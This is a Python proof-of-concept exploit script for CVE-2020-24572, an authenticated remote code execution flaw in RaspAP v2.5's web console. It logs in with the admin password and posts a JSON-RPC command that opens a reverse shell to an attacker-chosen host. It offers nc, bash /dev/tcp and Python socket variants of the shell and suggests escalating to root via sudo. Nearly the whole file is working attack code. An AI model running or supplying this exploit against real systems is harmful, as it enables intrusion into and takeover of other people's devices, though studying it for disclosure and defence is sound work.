#/usr/bin/python3

#####################################################
###      Proof of Concept for CVE-2020-24572      ###
###     (Authenticated) Remote Code Execution     ###
###             via Webconsole.php in             ###
###                  RaspAP v2.5                  ###
###         github.com/billz/raspap-webgui        ###
###         github.com/nickola/web-console        ###
#####################################################
### Re-Written by: gerberop       Date:03/31/2021 ###
#####################################################
### Credit: lunchb0x - Disc. Date: 08/24/2020     ###
#####################################################
###         github.com/gerberop/CVE-2020-24572    ###
#####################################################

import os
import sys
import requests
from termcolor import colored

if len(sys.argv) != 7:
    print("-------------------------------------------------------------------------------------------------")
    print("USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass] [payload]")
    print("-------------------------------------------------------------------------------------------------")
    print("Payload options: \n1. nc reverse shell\n2. bash reverse shell\n3. python reverse shell")
    print("-------------------------------------------------------------------------------------------------")
    exit(1)

target = sys.argv[1]
port = sys.argv[2]
listener_ip = sys.argv[3]
listener_port = sys.argv[4]
raspap_user = "admin"
raspap_pass = sys.argv[5]
payload = sys.argv[6]

if payload == '1':
  cmd = f"nc -e /bin/bash {listener_ip} {listener_port}"
elif payload == '2':
  cmd = f"/bin/bash -c 'bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
elif payload == '3':
  cmd = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_ip}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

session = requests.Session()
session.auth = (raspap_user, raspap_pass)


json_req_1 = {
              "jsonrpc":"2.0",
              "method":"run",
              "params":["NO_LOGIN",
                        {"user":"","hostname":"","path":""},
                        f"{cmd}"
                        ],
              "id":6
              }

print(colored("[!]", 'green') + f" Using Reverse Shell: {cmd}")
print(colored("[!]", 'yellow') + " Sending activation request - Make sure your listener is running . . .")
input(colored("[>>>]", 'green')+" Press ENTER to continue . . .")
os.system("stty echo")
print(colored("\n[!]", 'green') + " You should have a shell :)")
print(colored("\n[!]", 'red') + " Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh")
os.system("stty echo")
r = session.post("http://%s:%s/includes/webconsole.php"%(target,port), json=json_req_1)
print(colored("[*]", 'green') + " Done.")